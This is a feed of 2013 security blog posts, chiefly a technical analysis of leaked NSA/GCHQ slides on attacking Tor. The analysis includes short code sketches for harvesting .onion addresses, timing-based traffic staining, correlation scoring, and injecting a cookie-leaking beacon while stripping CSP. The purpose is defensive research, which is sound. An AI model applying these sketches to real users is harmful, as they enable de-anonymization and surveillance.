<p>And also, to close up with Evernote, I think it'd be <strong class="themainlink">awesome if Evernote came out and confirmed that their Smart Title Feature, and their app in general, does not send all your contacts, calendar events, or anything up to their servers except the notes you create.</strong></p>

<p><small>I recognize there are constraints to doing what I describe: battery life, computation speed, backgrounding, etc etc. I view these in the same vein as other engineering problems - they can be overcome with ingenuity, challenging assumptions, testing, and hard work.</small></p>

<p><small>
<sup>1</sup> Flame me again for using Google, but DuckDuckGo's search results just aren't as good on this query.<br />
<sup>2</sup> I can't stress this enough.  I don't know if Evernote is doing something scummy that I <em>didn't</em> uncover in the literally-one-hour I spent on this. Their <a href="https://evernote.com/legal/privacy.php">privacy policy</a> says things like "we automatically gather non-personally identifiable information that indicates your association with one of our business partners", "Any Content you add to your account", and "The geographic area where you use your computer and mobile devices (as indicated by an IP address or similar identifier)".  However, it doesn't say "We take all your data."<br />
<sup>3</sup> I've had a bag in my car for over a month. Sell me this app, please.<br />
<sup>4</sup> I think, but am not sure, this is what SnapChat does.<br />
<sup>5</sup> I'm aware this design isn't perfect, but it's pretty good given the objectives and constraints.<br />
<sup>6</sup> While apps like Silent Circle and Wickr are coming close, I think apps should remember to build an awesome useable product first, and make the privacy preserving part supplemental as opposed to the primary selling point.
</small></p>

<br /><br />
<hr style="width:50%">
<a name="update"></a>
<center><strong class="themainlink">Update:</strong> I got a response back from Evernote!</center>


<p>Shortly after posting this article, I got an email from a nice guy named Grant at Evernote, who gave me permission to post:</p>

<blockquote>
<p>Hi Tom,</p>

<p>I read your blog post about privacy preserving applications and Evernote. I can confirm that the Smart Title feature, and the app in general, does not send all your contacts, calendar events, or anything else to Evernote servers except for the content of the notes you create.</p>

<p>You might find Evernote’s Three Laws of Data Protection interesting–specifically the second law: <a href="http://blog.evernote.com/blog/2011/03/24/evernotes-three-laws-of-data-protection/">http://blog.evernote.com/blog/2011/03/24/evernotes-three-laws-of-data-protection/</a></p>
</blockquote>

<p>Having an employee (Grant works as an Engineer, not in 'Public Relations') reach out to a random blog author is, in my opinion, a good sign of a straightforward and honest company.  And I quite like the second law.</p>

<blockquote><strong>Everything you put into Evernote is private by default. We never look at it, analyze it, share it, use it to target ads, data mine it, etc.–unless you specifically ask us to do one of these things. Our business model does not depend on "monetizing" your data in any way. Rather, it depends on building trust and providing a great service that more and more people choose to pay for.</strong></blockquote>

<p>So props to Evernote. :)</p>
]]></description>
	</item>

	<item>
		<guid>http://ritter.vg/blog-tls_mailing_list.html</guid>
		<title>Funniest Exchange Ever on the TLS Mailing List</title>
		<pubDate>06 Nov 2013 16:33:23 EST</pubDate>
		<description><![CDATA[
<p>Background: there's this huge problem where TLS ClientHellos that exceed 255 bytes result in hangs for certain hardware (like some F5 hardware).  Hangs are horrible because the only thing you can do is have a timeout and reconnect – super slow.  So we're trying to add extensions (like ALPN for SPDY) and new ciphersuites, all while keeping the size under 255 bytes.  Someone asks "Hey how come this happens at all."  Someone from F5 responds...</p>

<p>Players:
<ul>
  <li>Xiaoyong Wu - from F5
  <li>Adam Langley - who's in charge of pretty much everything SSL at Google (Chrome and Webservers)
  <li>Yoav Nir - longtime TLS mailing list contributor and engineer
  <li>Stephen Henson - maintainer of OpenSSL
</ul></p>

<pre>
Xiaoyong Wu X.Wu@f5.com via ietf.org 
  
It is a little bit more calculation than that and related to some historic reasons, aka SSLv2.

For SSL records, the SSLv3 and TLS ClientHello headers are as follows:

| 22 | version major | version minor | length high bits | length low bits |

If this is interpreted as an SSLv2 header, it will be considered as a 3 byte header:
| v2 header b0 | v2 header b1 | v2 header b2 | message type |

The value for Client Hello message type is SSLV2_MT_CLIENTHELLO which is 1.
When there is an SSLv3/TLS client-hello of length 256 - 511 bytes, this is ambiguous as "message 
type" is 1 or it is the "length high bits" to be 1.

Our implementation before the patch was to prefer SSLv2 and thus the issue.

As I am explaining this in detail, I would say that another work around on this would be making a 
client hello that exceeds 512 in length.
</pre>


<pre>
Adam Langley via ietf.org 
  
On Wed, Nov 6, 2013 at 1:00 PM, Xiaoyong Wu <X.Wu@f5.com> wrote:
> As I am explaining this in detail, I would say that another work around on this would be making a 
> client hello that exceeds 512 in length.

^^^ Holy crap. I wish I had known that sooner. That might solve the issue.

Cheers

AGL
</pre>



<pre>
Yoav Nir via ietf.org 
    
On Nov 6, 2013, at 10:03 AM, Adam Langley <agl@google.com> wrote:
> On Wed, Nov 6, 2013 at 1:00 PM, Xiaoyong Wu <X.Wu@f5.com> wrote:
>> As I am explaining this in detail, I would say that another work around on this would be making a 
>> client hello that exceeds 512 in length.
>
> ^^^ Holy crap. I wish I had known that sooner. That might solve the issue.

Time to standardize the "jpeg-of-cat" extension for TLS.
</pre>


<pre>
Dr Stephen Henson lists@drh-consultancy.co.uk via ietf.org 

On 06/11/2013 18:03, Adam Langley wrote:
> On Wed, Nov 6, 2013 at 1:00 PM, Xiaoyong Wu <X.Wu@f5.com> wrote:
>> As I am explaining this in detail, I would say that another work around on this would be making a 
>> client hello that exceeds 512 in length.
>
> ^^^ Holy crap. I wish I had known that sooner. That might solve the issue.

Just did a quick test with OpenSSL on a couple of known "hang" machines. Seems
to work.

Steve.
</pre>

<p>The thread is <a href="http://www.ietf.org/mail-archive/web/tls/current/threads.html#10405">here</a>. Obviously it'll take a lot of testing to figure out if this works reliably, but I think a lot of people are cautiously excited.</p>
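<p>If you want to see why the 256-511 byte range specifically is cursed, the arithmetic is simple enough to sketch (my own illustration of what Xiaoyong describes, not F5's actual parser):</p>

```java
// A sketch of the ClientHello ambiguity described above. A TLS record
// header is: type(22) | version major | version minor | len hi | len lo.
// An SSLv2-tolerant parser that assumes a 3-byte record header reads
// byte 3 as the message type -- and SSLV2_MT_CLIENTHELLO is 1.
// My own illustration, not anyone's actual implementation.
class HelloAmbiguity {
    static byte[] tlsRecordHeader(int bodyLength) {
        return new byte[] { 22, 3, 1,                 // handshake, TLS 1.0
            (byte)(bodyLength >> 8), (byte)(bodyLength & 0xff) };
    }

    // What a 3-byte-header SSLv2 parser sees as the "message type":
    // it's really the high byte of the TLS record length.
    static int sslv2MessageType(byte[] header) {
        return header[3] & 0xff;
    }

    public static void main(String[] args) {
        // 256..511-byte hellos: len hi == 1 == SSLV2_MT_CLIENTHELLO -> ambiguous
        System.out.println(sslv2MessageType(tlsRecordHeader(300))); // 1
        // Padding past 511 bumps the byte to 2 -- no longer a v2 ClientHello
        System.out.println(sslv2MessageType(tlsRecordHeader(600))); // 2
    }
}
```

<p>So a ClientHello of 256-511 bytes puts a 1 exactly where an SSLv2-tolerant parser looks for the message type - and padding past 511 bytes bumps that byte to 2, which is why the workaround works.</p>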
]]></description>
	</item>

	<item>
		<guid>http://ritter.vg/blog-otf_report.html</guid>
		<title>Open Technology Fund Audit Report</title>
		<pubDate>21 Oct 2013 12:37:23 EST</pubDate>
		<description><![CDATA[
<p>Over the past year, iSEC Partners has worked with the <a href="https://www.opentechfund.org/">Open Technology Fund</a> on several of their supported projects, and I've been extremely fortunate to have a finger, arm, or whole body in each of the audits.  For most of them I was an Account Manager (just helping arrange the audit between the project and some of our extremely talented consultants), but I also got to roll up my sleeves and take on a couple myself.</p>

<p>If you haven't heard of OTF, they fund projects that develop open and accessible technologies promoting human rights and open societies. Some of the projects they support that we've been able to work on are <a href="https://whispersystems.org/">Open Whisper Systems</a>' RedPhone and TextSecure, <a href="https://commotionwireless.net">Commotion</a>, and <a href="https://globaleaks.org/">GlobaLeaks</a>, among others. </p>

<p>I also got to work on a followup of the <a href="/blog-libtech_guidelines.html">Liberation Technology Auditing Guidelines</a> I authored in the beginning of the year.  In conjunction with the audits iSEC performed, I also helped OTF review their audit process.  The goal of this review was to take a look at the breadth, scope, and coverage of security audits performed on OTF-funded applications to date. I aimed to identify the strengths and shortcomings in OTF's current process, and to provide recommendations to improve the breadth of coverage and derive greater value in the future.  The report is (hopefully) applicable to both OTF and other funding agencies in the Liberation Technology and Civil Society communities, and iSEC and I hope this work inspires more development and more integration between security professionals and project teams. OTF has published this review over <a href="https://www.opentech.fund/news/report-how-to-evaluate-technical-audits-as-a-funder/" class="themainlink">on their website</a> where you can take a look.</p>
]]></description>
	</item>

	<item>
		<guid>http://ritter.vg/blog-tor-nsa-slide-decks.html</guid>
		<title>About the Tor/NSA Slide Decks</title>
		<pubDate>7 Oct 2013 09:02:23 EST</pubDate>
		<description><![CDATA[
<p>Unless you've been living under a rock for the past weekend, you heard about several documents published by The Guardian and The Washington Post that are (likely) from the NSA, explaining how they deal with Tor.  I wanted to take a look and analyze them from a technical standpoint.</p>

<p>The good news from these documents is that Tor is doing pretty good.  There's a host of quotes that confirm what we hoped: that while there are a lot of techniques the NSA uses to attack Tor, they don't have a complete break.  Quotes like "We will never be able to de-anonymize all Tor users all the time" and that they have had "no success de-anonymizing a user in response to a request/on-demand". [0]  We shouldn't take these as gospel, but they're a good indicator.</p>

<p>Now something else to underscore in the documents that were released, and in the <a href="http://icontherecord.tumblr.com/post/63103784923/dni-statement-why-the-intelligence-community">DNI statement</a>, is that bad people use Tor too. Tor is a technology, no different from Google Earth or guns - it can be used for good or bad. It's not surprising or disappointing to me that the NSA and GCHQ are analyzing Tor.</p>

<p>But from a threat modeling perspective - there's no difference between the NSA/GCHQ and China or Iran. They're both well-funded adversaries who can operate over the entire Internet and have co-opted national ISPs and inter-network links to monitor traffic. But from my perspective, the NSA is pretty smart, and they have unmatched resources. If they want to target someone, they're going to be able to do so - it's only a matter of putting effort into it. It's impossible to completely secure an entire ecosystem against them. But you can harden it. The documents we've seen say that they have operating concerns[1], and Schneier says the following:</p>

<blockquote>The most valuable exploits are saved for the most important targets. Low-value exploits are run against technically sophisticated targets where the chance of detection is high. TAO maintains a library of exploits, each based on a different vulnerability in a system. Different exploits are authorized against different targets, depending on the value of the target, the target's technical sophistication, the value of the exploit, and other considerations.[4]</blockquote>

<p>What this means to me is that by hardening Tor, we're ensuring that the attacks the NSA does run against it (which no one would be able to stop completely) will only be run against the highest value targets - real bad guys. The more difficult it is to attack, the higher the value of a successful exploit the NSA develops - that means the exploit is conserved until there is a worthwhile enough target. The NSA still goes after bad guys, while all state-funded intelligence agencies have a significantly harder time de-anonymizing or mass-attacking Tor users. That's speculation of course, but I think it makes sense.</p>
 
<p>That all said - let's talk about some technical details.</p>

<h3>Fingerprinting</h3>

<p>The NSA says they're interested in distinguishing Tor users from non-Tor users[1]. They describe techniques that fingerprint the Exit Node -> Webserver connection, and techniques on the User -> Entry Node connection.</p>

<p>They mention that Tor Browser Bundle's <a href="https://developer.mozilla.org/en-US/docs/Web/API/window.navigator.buildID">buildID</a> is 0, which does not match Firefox's. The buildID is a javascript property - to fingerprint with it, you need to send javascript to the client for them to execute. (TBB's behavior was <a href="https://gitweb.torproject.org/torbrowser.git/commitdiff/HEAD?hp=240ba487a34c43d4031d5b861bc9e984b308fc32">recently changed</a>, for those trying it at home.)  But the NSA sitting on a website wondering if a visitor is from Tor doesn't make much sense. All Tor exit nodes are public.  In most cases (unless you chain Tor to a VPN) - the exit IP will be an exit node, and you can fingerprint on that. Changing TBB's buildID to match Firefox may eliminate that one, single fingerprint - but in the majority of cases you don't need it.</p>

<p>What about the other direction - watching a user and seeing if they're connecting to Tor?  Well, most of the time, users connect to publicly known Tor nodes. A small percentage of the time, they'll connect to unknown Tor bridges. Those bridges will then connect to known Tor nodes, and the bridges are distinguishable from a user/Tor client because they accept connections.  So while a Globally Passive Adversary could enumerate all bridges, the NSA is mostly-but-not-entirely-global.  They can enumerate all bridges within their sphere of monitoring, but if they're monitoring a single target outside their sphere, that target may connect to Tor without them being sure it's Tor.</p>

<p>Well, without being sure it's Tor based solely on the source and destination IPs.  There are several tricks they note in [2] that let them distinguish the traffic using Deep Packet Inspection. Those include a fixed TLS certificate lifetime, the Issuer and Subject names in the TLS certificate, and the DH modulus. I believe, but am not sure, that some of these have been changed recently in Tor, or are in the process of being redesigned - I need to follow up on that.</p>

<p>Another thing the documents discuss at length is "staining" a target so they are distinguishable from all other individuals[3]. This "involves writing a unique marker (or stain) onto a target machine". The most obvious technique would be putting a unique string in the target's browser's User Agent. The string would be visible in HTTP traffic - which matches the description that the stain is visible in "passive capture logs".</p>

<p>However, the User Agent has a somewhat high risk of detection. While it's not that common for someone to look at their own User Agent using any of the many free tools out there - I wouldn't consider it unusual, especially if you were concerned with how trackable you were.  Also, not to read too closely into a single sentence, but the documents do say that the "stain is visible in passively collected SIGINT and is stamped into every packet". "Every packet" - not just HTTP traffic.</p>

<p>If you wanted to be especially tricky, you could put a marker into something much more subtle - like TCP sequence numbers, IP flags, or IP identification fields.  Someone had proffered the idea that a particularly subtle backdoor would be replacing the system-wide Random Number Generator on Windows with DUAL_EC_DRBG using a registry hack.</p>

<p>Something else to note is that the NSA is aware of obfsproxy, Tor's obfuscated transport for avoiding nation-state DPI blocking, and also the tool Psiphon. Tor and Psiphon both try to hide as other protocols (SSL and SSH, respectively). According to the leaked documents, they use a seed and verifier protocol that the NSA has analyzed[2]. I'm not terribly familiar with the technical details there, so the notes in the documents may make more sense after I've looked at those implementations.</p>


<h3>Agencies Run Nodes</h3>

<p>Yup, Intelligence Agencies do run nodes. It's been long suspected, and Tor is explicitly architected to defend against malicious nodes - so this isn't a doomsday breakthrough.  Furthermore, the documents even state that they didn't make many operational gains by running them.  According to Runa, the NSA never ran exit nodes.</p>

<blockquote class="twitter-tweet"><p>What I said in my <a href="https://twitter.com/_defcon_">@_defcon_</a> talk is still true: the NSA never ran Tor relays from their own networks, they used Amazon Web Services instead.</p>&mdash; Runa A. Sandvik (@runasand) <a href="https://twitter.com/runasand/statuses/386164730991083521">October 4, 2013</a></blockquote>

<blockquote class="twitter-tweet"><p>The Tor relays that the NSA ran between 2007 and 2013 were NEVER exit relays (flags given to these relays were fast, running, and valid).</p>&mdash; Runa A. Sandvik (@runasand) <a href="https://twitter.com/runasand/statuses/386163444635824128">October 4, 2013</a></blockquote>

<blockquote class="twitter-tweet"><p>Correction of <a href="https://t.co/U5v7krwZH0">https://t.co/U5v7krwZH0</a>: the NSA <a href="https://twitter.com/search?q=%23Tor&amp;src=hash">#Tor</a> relays were only running between 2012-02-22 and 2012-02-28.</p>&mdash; Runa A. Sandvik (@runasand) <a href="https://twitter.com/runasand/statuses/386197199329062913">October 4, 2013</a></blockquote>


<p>Something I'm going to hit upon in the conclusion is how we shouldn't assume that these documents represent <em>everything</em> the NSA is doing. As pointed out by my partner in a conversation on this - it would be entirely possible for them to slowly run more and more nodes until they were running a sizable percentage of the Tor network.  Even though I'm a strident supporter of anonymous and pseudonymous contributions, it's still a worthwhile exercise to measure what percentage of exit, guard, and path probabilities can be attributed to node operators who are known to the community. Nodes like NoiseTor's, or torservers.net are easy, but also nodes whose operators have a public name tied into the web of trust. If we assume the NSA would want to stay as anonymous and deniable as possible in an endeavor to become more than a negligible percentage of the network - tracking those percentages could at least alert us to a shrinking percentage of nodes being run by people 'unlikely-to-be-intelligence-agencies'.</p>

<p>This is especially true because in [0 slide 21] they put forward several experiments they're interested in performing on the nodes that they do run:</p>

<ol>
<li>Deploying code to aid with circuit reconstruction</li>
<li>Packet Timing attacks</li>
<li>Shaping traffic flows</li>
<li>deny-degrade/disrupt comms to certain sites</li>
</ol>

<h3>Operational Security</h3>

<p>Something the documents hit upon is what they term EPICFAIL - mistakes made by users that 'de-anonymize' them.  It's certainly the case that some of the things they mention lead to actionable de-anonymization.  Specifically, they mention some cookies persisting between Tor and non-Tor sessions (like Doubleclick, the ubiquitous ad cookie) and using unique identifiers, such as email and web forum names.</p>

<p>If your goal is to use Tor anonymously, those practices are quite poor.  But something they probably need to be reminded of is that not everyone uses Tor to be <em>anonymous</em>.  Lots of people log into their email accounts and Facebook over Tor - they're not trying to be anonymous. They're trying to prevent snooping by corporate proxies, their ISP, or national monitoring systems, to bypass censorship, or to disguise their point of origin.</p>

<p>So - poor OpSec leads to a loss of anonymity. But if you laughed at me because you saw me log into my email account over Tor - you missed the point.</p>

<h3>Hidden Services</h3>

<p>According to the documents, the NSA had made no significant effort to attack Hidden Services. However, their goals were to distinguish Hidden Services from normal Tor clients and harvest .onion addresses. I have a feeling the latter is going to be considerably easier when you can grep every single packet capture looking for .onion's.</p>
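<p>Harvesting really is about that easy: hidden service addresses of this era are exactly 16 base32 characters followed by ".onion", so pulling them out of captured plaintext is one regex.  A quick sketch of my own (not anything from the slides) using the Tor Project's well-known example address:</p>

```java
import java.util.ArrayList;
import java.util.List;
import java.util.regex.Matcher;
import java.util.regex.Pattern;

// Pull hidden service addresses out of captured plaintext. Onion addresses
// (as of 2013) are exactly 16 base32 characters (a-z, 2-7) before ".onion",
// so one regex over a capture's printable strings finds them all.
// My own sketch, not anything from the leaked documents.
class OnionHarvest {
    static final Pattern ONION = Pattern.compile("\\b[a-z2-7]{16}\\.onion\\b");

    static List<String> harvest(String plaintext) {
        List<String> found = new ArrayList<>();
        Matcher m = ONION.matcher(plaintext);
        while (m.find())
            found.add(m.group());
        return found;
    }

    public static void main(String[] args) {
        System.out.println(harvest(
            "GET http://duskgytldkxiuqc6.onion/ HTTP/1.1"));
    }
}
```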

<p>But just because the NSA hadn't focused much on Hidden Services by the time the slides were made doesn't mean others haven't.  Weinmann, et al. authored an <a href="http://www.ieee-security.org/TC/SP2013/papers/4977a080.pdf">explosive paper</a> this year on Hidden Services, where they are able to enumerate all Hidden Service addresses, measure the popularity of a Hidden Service, and in some cases, de-anonymize a Hidden Service. There isn't a much bigger break against HS than these results - if the NSA hadn't thought of this before Ralf, I bet they kicked themselves when the paper came out.</p>

<p>And what's more - the FBI had two high profile takedowns of Hidden Services - Freedom Hosting and Silk Road. While Silk Road appears to be a result of detective work finding the operator, and then following him to the server, I've not seen an explanation for how the FBI located or exploited Freedom Hosting. </p>

<p>Overall - Hidden Services need a <a href="https://blog.torproject.org/blog/hidden-services-need-some-love">lot of love</a>. They need redesigning, reimplementing, and redeploying. If you're relying on Hidden Services for strong anonymity, that's not the best choice. But whether you are or not - if you're doing something illegal and high-profile enough, you can expect law enforcement to be following up sooner or later.</p>

<h3>Timing De-Anonymization</h3>

<p>This is another truly clever attack. The technique relies on "[sending] packets back to the client that are detectable by passive accesses to find client IPs for Tor users" using a "Timing Pattern" [0 slide 13]. This doesn't seem like that difficult of an attack - the only wrinkle is that Tor splits and chunks packets into 512-byte cells on the wire.</p>

<p>If you're in control of the webserver the user is contacting (or anywhere between the webserver and the exit node) - the way that I'd implement this is by changing the IP packet timing to be extremely uncommon. Imagine sending one 400-byte packet, waiting 5 seconds, sending two 400-byte packets, waiting 5 seconds, sending three 400-byte packets, and so on.  What this will look like for the user is receiving one 512-byte Tor cell, then a few seconds later, two 512-byte Tor cells, and so on. While the website load may seem slow - it'd be almost impossible to see this attack in action unless you were performing packet captures and looking for irregular timing.  (Another technique might ignore/override the <a href="https://en.wikipedia.org/wiki/Congestion_window">TCP Congestion Window</a>, or something else - there are several ways you could implement this.)</p>
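<p>Sketched out, a pattern like the one I describe is trivial to generate and just as trivial for a passive observer to match.  <u>TimingStain</u> below is purely my own toy illustration of the idea, not anything from the documents:</p>

```java
import java.util.ArrayList;
import java.util.List;

// Generate and match the escalating burst pattern described above: one
// packet, a pause, two packets, a pause, three packets, and so on.
// Purely illustrative -- my own toy, not anything from the leaked slides.
class TimingStain {
    // Send-time offsets (seconds) for `bursts` bursts separated by `gap`:
    // [0.0, gap, gap, 2*gap, 2*gap, 2*gap, ...]
    static List<Double> schedule(int bursts, double gap) {
        List<Double> offsets = new ArrayList<>();
        for (int b = 1; b <= bursts; b++)
            for (int i = 0; i < b; i++)
                offsets.add((b - 1) * gap);
        return offsets;
    }

    // A naive passive observer: do the observed arrival times show the
    // same staircase? A real matcher would have to tolerate jitter.
    static boolean matchesPattern(List<Double> arrivals, int bursts, double gap) {
        return arrivals.equals(schedule(bursts, gap));
    }

    public static void main(String[] args) {
        System.out.println(schedule(3, 5.0)); // [0.0, 5.0, 5.0, 10.0, 10.0, 10.0]
    }
}
```

<p>Presumably the escalating burst counts are what make this robust: even if the fixed gaps get smeared by network jitter, the 1-2-3 staircase survives, and almost no legitimate traffic looks like that.</p>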

<p>Two other things are worth noting about this. First, the slides say "GCHQ has research paper and demonstrated capability in the lab". It's possible this attack has graduated out of the lab and is now being run live - that would be concerning, because this is potentially an attack that could perform mass de-anonymization of Tor users. Second, it's extremely difficult to counter. The simplest countermeasures (adding random delays, cover traffic, and padding) can generally be defeated with repeated observations. That said - repeated observations are not always possible in the real world. I think a worthwhile research paper would be to implement some or all of these countermeasures, perform the attack, and measure what type of security margin you can gain.</p>

<p>There is also the question "Can we expand to other owned nodes?" These 'owned nodes' may be webservers they've compromised, Tor nodes they control, Quantum servers - it's not clear.</p>


<h3>End-to-End Traffic Confirmation</h3>

<p>Of all our academic papers and threat modeling - this is the one we may have feared the most.  The NSA is probably the closest thing to a Global Passive Adversary we have - they're able to monitor large amounts of the Internet infrastructure, log it, and review it. In an End-to-End Traffic Confirmation attack, they lay out the plan of attack in [0 slide 6]: "look for connections to Tor, from the target's suspected country, near time of target's activity".  They're performing it in the reverse of how I generally think of it: instead of trying to figure out what a particular user is doing - they see activity on a website, and try to figure out which user is performing it.</p>

<p>There's no indication of the specifics of how they perform the query: they say they look for "connections to Tor", but does that mean single-hop directory downloads, circuit creation, initial conversation, or something else? Do they take into account packet timings? Traffic size?  All of these things could help refine the attack.</p>
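<p>As a sketch of the underlying idea - names, thresholds, and scoring are all hypothetical, nothing here comes from the slides - the crudest version of such a query just counts how many activity events on the target site are preceded by a candidate's Tor connection within some window:</p>

```python
# Sketch: naive end-to-end traffic confirmation scoring. Timestamps are in
# seconds; `window` is how long before an activity event a Tor connection
# still counts as correlated. Purely illustrative.

def confirmation_score(activity_times, connection_times, window=30.0):
    """Count activity events that have a connection within `window` seconds
    before them. Higher score = stronger (circumstantial) correlation."""
    return sum(
        any(0 <= a - c <= window for c in connection_times)
        for a in activity_times
    )

def rank_candidates(activity_times, candidates, window=30.0):
    """candidates: dict mapping user -> list of observed connection times.
    Returns users ordered from most to least correlated."""
    return sorted(
        candidates,
        key=lambda u: confirmation_score(activity_times, candidates[u], window),
        reverse=True,
    )
```

<p>Refinements like packet timing and traffic size would shrink the window and cut false positives, which is presumably what distinguishes a working tool from one that "produced no obvious candidate selectors".</p>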

<p>According to the slides, GCHQ has a working version dubbed QUICKANT. The NSA has a version as well that "produced no obvious candidate selectors". The NSA goals were to figure out if QUICKANT was working for GCHQ, and to continue testing the NSA's version using profiles of "consistent, random and heavy user" - if we assume they don't like the Oxford comma, that's three profiles: a regular, consistent connection to a server; a random connection; and a heavy Tor user.</p>

<p>How do you frustrate End-to-End Confirmation attacks?  Well, the bad news is that in a Low Latency Onion Routing network - you don't. Ultimately it's going to be a losing proposition, so most of the time you don't try, and instead focus on other tasks.  Just like "Timing De-Anonymization" above (which itself is a form of End-to-End Confirmation), it'd be worth investigating random padding, random delays, and cover traffic to see how much of a security margin you can buy.</p>

<h3>Cookie De-Anonymization</h3>

<p>This is a neat trick I hadn't thought of. They apparently have servers around the Internet, dubbed "Quantum" servers, that perform attacks at critical routing points. One of the things they do with these servers is perform Man-in-the-Middle attacks on connections. The slides[0] describe an attack dubbed QUANTUMCOOKIE that will detect a request to a specific website, and respond with a redirection to Hotmail or Yahoo or a similar site.  The client receives the redirect and will respond with any browser cookies they have for Hotmail or Yahoo. (Slides end, speculation begins:) The NSA would then hop over to their PRISM interface for Hotmail or Yahoo, query the unique cookie identifier, and try to run down the lead.</p>

<p>Now the thing that surprises me the most about this attack is not how clever it is (it's pretty clever though) - it's how risky it is. Let's imagine how it would be implemented. Because they're trying to de-anonymize a user, and because they're hijacking a connection to a specific resource - they <em>don't</em> know which user they're targeting. They just want to de-anonymize anyone who accesses, say, example.com. So already, they're sending this redirection to indiscriminate users who might detect it.  Next, the slides say "We detect the GET request and respond with a redirect to Hotmail and Yahoo!". You can't send a 300-level redirect to two sites, but if I were implementing the attack, I'd want to go for the lowest detection probability. The way I'd implement that is by doing a true Man-in-the-Middle and very subtly adding a single element reference to Hotmail, Yahoo, and wherever else. The browser will request that element and send along the cookie.  <em>However</em>, two detection points remain: a) if you use a javascript or css element, you risk the target blocking it with NoScript and being alerted, and b) if the website uses Content Security Policy, you will need to remove that header as well.  Both points can be overcome - but the more complicated the attack, the riskier it becomes.</p>
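<p>Here's what that injection step might look like in the abstract. This is my illustration, not anything from the slides - the URL is a stand-in, and a real attack would rewrite traffic at the packet level rather than as a string operation:</p>

```python
# Sketch of the injection described above: subtly add a single cross-origin
# image reference to an HTML response so the browser leaks its cookies for
# that origin, and strip CSP so the reference isn't blocked.

def inject_beacon(html, beacon_url="https://mail.example.com/pixel.gif"):
    """Insert a 1x1 image reference just before </body>; the browser fetches
    it and attaches any cookies it holds for that origin."""
    tag = '<img src="%s" width="1" height="1" alt="">' % beacon_url
    if "</body>" in html:
        return html.replace("</body>", tag + "</body>", 1)
    return html + tag  # no closing body tag: append at the end

def strip_csp(headers):
    """Remove Content-Security-Policy so the injected element can load."""
    return {k: v for k, v in headers.items()
            if k.lower() != "content-security-policy"}
```

<p>Even in this simplified form, both detection points from above are visible: the injected element is in the page for anyone to inspect, and the missing CSP header is itself an anomaly a paranoid site operator could notice.</p>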


<h3>Exploitation</h3>

<p>Finally - let's talk about the exploits mentioned in the slides.</p>

<h4>Initial Clientside Exploitation</h4>

<p>Let's first touch on a few obvious points. They mention that their standard exploits don't work against Tor Browser Bundle, and imply this may be because they are Flash-based. [0 slide 16, 1] But as Chrome and other browsers block older Flash versions, and click-to-play becomes more standard, any agency interested in exploitation would need to migrate to 'pure' browser-based exploits, which is what [1] indicates. [1] talks about two pure-Firefox exploits, including one that works on TBB based on FF-10-ESR.</p>

<p>This exploit was apparently a type confusion in <a href="https://en.wikipedia.org/wiki/ECMAScript_for_XML">E4X</a> that enabled code execution via "the CTypes module" (which may be <a href="https://developer.mozilla.org/en-US/docs/Mozilla/js-ctypes?redirectlocale=en-US&redirectslug=Mozilla%2FJavaScript_code_modules%2Fctypes.jsm">js-ctypes</a>, but I'm not sure). [1] They mention that they can't distinguish the Operating System, Firefox version, or 32/64 bitness "until [they're] on the box" but that "that's okay" - which seems very strange to me, because every attacker I know would just detect all those properties in javascript and send the correct payload. Does the NSA have some sort of cross-OS payload that pulls down a correct stager?  Seems unlikely; I'll chalk this up to reading too much into semi-technical bullet points in a PowerPoint deck.</p>

<p>This vulnerability was fixed in FF-ESR-17, but the FBI's recent exploitation of a FF-ESR-17 bug (fixed in a point release most users had not upgraded to) shows that the current version of FF is just as exploitable. These attacks show the urgency of hardening Firefox and creating a smooth update mechanism. The Tor Project is wary of automatic updates (the signing key becomes a significant liability, and there's the possibility of compelled updates) - but I think that could be overcome through multi-signing and distributing trust across people and jurisdictions. Automatic updates are critical to deploying fixes quickly.</p>
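<p>The "multi-signing and distribution of trust" idea can be sketched as a k-of-n check: an update is accepted only when enough independent keys, ideally held in different jurisdictions, have signed it. This is my own illustration - verification is mocked with HMAC here purely to keep the sketch self-contained; real update signing would use asymmetric signatures:</p>

```python
# Sketch: k-of-n update acceptance, so no single compelled or stolen signing
# key can push a malicious update. HMAC stands in for real signatures.
import hashlib
import hmac

def verify(update: bytes, sig: bytes, key: bytes) -> bool:
    expected = hmac.new(key, update, hashlib.sha256).digest()
    return hmac.compare_digest(expected, sig)

def accept_update(update: bytes, sigs: dict, keys: dict, threshold: int) -> bool:
    """sigs and keys are dicts keyed by signer name. Accept the update only
    if at least `threshold` trusted signers produced a valid signature."""
    good = sum(1 for name, key in keys.items()
               if name in sigs and verify(update, sigs[name], key))
    return good >= threshold
```

<p>With a threshold of, say, 2-of-3 signers, compelling one key holder accomplishes nothing, which is exactly the property you'd want before turning automatic updates on.</p>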

<p>Hardening Firefox is also critical.  If anyone writes <a href="https://en.wikipedia.org/wiki/ECMAScript_for_XML">XML in javascript</a> I don't think I want to visit their website anyway.  This isn't an exhaustive list, but some of the things I'd look at for hardening Firefox would be:</p>

<ol>
<li>Sandboxing - a broad category, but Chrome's sandboxing model makes exploitation significantly more difficult.
<li>The <a href="http://www.matasano.com/research/Attacking_Clientside_JIT_Compilers_Paper.pdf">JIT Compiler</a>
<li>All third party dependencies - review what they're used for, what percentage of the imported library is actually used, what its security history is, and whether they can be shrunk, removed, or disabled. Just getting an inventory of these with descriptions and explanations of use will help guide security decisions.
<li>Obscure and little-used features - especially in media and CSS parsing. See if these features can be disabled in Tor Browser Bundle to reduce the attack surface, or blocked until whitelisted by NoScript. The E4X feature is a fantastic example of this. Little-used Web Codecs would be another.
<li>Alternate scheme support - looking at about:config with the filter "network.protocol-handler" it looks like there are active protocol handlers for snews, nntp, news, ms-windows-store (wtf?), and mailto. I think those first four can probably be disabled for 99% of users.
</ol>
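<p>For that last item, the prefs could be flipped in a user.js file. The pref names below follow the "network.protocol-handler" pattern visible in about:config, but I haven't verified them against every Firefox version - treat them as an assumption to check, not gospel:</p>

```python
# Sketch: emit user.js lines disabling external handlers for little-used
# schemes. Pref names are assumed from the about:config filter mentioned
# above; verify against your Firefox version before relying on them.

HANDLERS_TO_DISABLE = ["snews", "nntp", "news", "ms-windows-store"]

def userjs_lines(schemes):
    return ['user_pref("network.protocol-handler.external.%s", false);' % s
            for s in schemes]
```
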

<p>For what it's worth, [2 slide 46] mentions that Tails (the Tor live-DVD distribution) adds severe exploitation annoyances. Tails would prevent an attacker from remaining persistent on the machine.</p>

<h4>Random Musings on Operations</h4>

<p>There's a strange slide with some internal references in one of the presentations. It took me a couple read-throughs, but then something clicked as a possible explanation. This is speculation, but judge for yourself if you think it makes sense.</p>

<p><center><img src="/resources/prefilter-hash.png" /></center></p>

